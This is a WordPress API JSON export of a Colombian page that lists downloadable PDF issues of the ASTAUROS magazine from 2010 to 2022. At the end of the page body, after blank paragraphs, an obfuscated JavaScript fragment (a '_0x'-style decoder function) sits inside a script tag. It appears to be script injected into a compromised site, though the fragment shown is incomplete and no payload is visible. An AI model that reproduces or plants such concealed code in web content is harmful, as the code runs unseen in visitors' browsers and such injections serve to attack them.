{"id":19,"date":"2022-12-01T23:08:39","date_gmt":"2022-12-01T23:08:39","guid":{"rendered":"https:\/\/astauros.com.co\/?page_id=19"},"modified":"2023-12-22T05:47:27","modified_gmt":"2023-12-22T05:47:27","slug":"revistas","status":"publish","type":"page","link":"https:\/\/astauros.com.co\/index.php\/revistas\/","title":{"rendered":"REVISTAS"},"content":{"rendered":"<p><strong>La revista ASTAUROS se viene publicando ininterrumpidamente desde hace 20 a\u00f1os.<\/strong><\/p>\n<p><strong>Este a\u00f1o con orgullo llegamos a Nuestra edici\u00f3n n\u00famero 20.<\/strong><\/p>\n<p><strong>Aqu\u00ed encontrar\u00e1s algunas ediciones en archivo digital.<\/strong><\/p>\n<p><strong>Selecciona y da click sobre el enlace del ejemplar que desees leer.<\/strong><\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2023\/12\/REVISTA-8-ANO-2010.pdf\">REVISTA # 8 ANO 2010<\/a><\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/REVISTA-13-ANO-2015.pdf\">REVISTA #13 A\u00d1O-2015<\/a><\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/REVISTA-14-ANO-2016.pdf\">REVISTA # 14 A\u00d1O-2016<\/a><\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/REVISTA-16-ANO-2018.pdf\">REVISTA # 16 A\u00d1O-2018<\/a><\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/REVISTA-17-ANO-2019.pdf\">REVISTA # 17 A\u00d1O-2019<\/a><\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/REVISTA-18-ANO-2020_C.pdf\">REVISTA # 18 A\u00d1O-2020_C<\/a><\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/REVISTA-19-ANO-2021_C.pdf\">REVISTA # 19 A\u00d1O-2021_C\u00a0<\/a><\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/REVISTA-ASTAUROS-20-2022_.pdf\">REVISTA ASTAUROS # 20 &#8211; 2022_<\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" class=\" wp-image-116 aligncenter\" src=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/Slider_main-300x98.jpg\" alt=\"\" width=\"370\" height=\"121\" srcset=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/Slider_main-300x98.jpg 300w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/Slider_main-1024x336.jpg 1024w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/Slider_main-768x252.jpg 768w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/Slider_main.jpg 1280w\" sizes=\"(max-width: 370px) 100vw, 370px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<div class=\"mh-excerpt\"><p>La revista ASTAUROS se viene publicando ininterrumpidamente desde hace 20 a\u00f1os. Este a\u00f1o con orgullo llegamos a Nuestra edici\u00f3n n\u00famero 20. Aqu\u00ed encontrar\u00e1s algunas ediciones <a class=\"mh-excerpt-more\" href=\"https:\/\/astauros.com.co\/index.php\/revistas\/\" title=\"REVISTAS\">[&#8230;]<\/a><\/p>\n<\/div>","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-19","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/pages\/19","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/comments?post=19"}],"version-history":[{"count":10,"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/pages\/19\/revisions"}],"predecessor-version":[{"id":406,"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/pages\/19\/revisions\/406"}],"wp:attachment":[{"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/media?parent=19"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}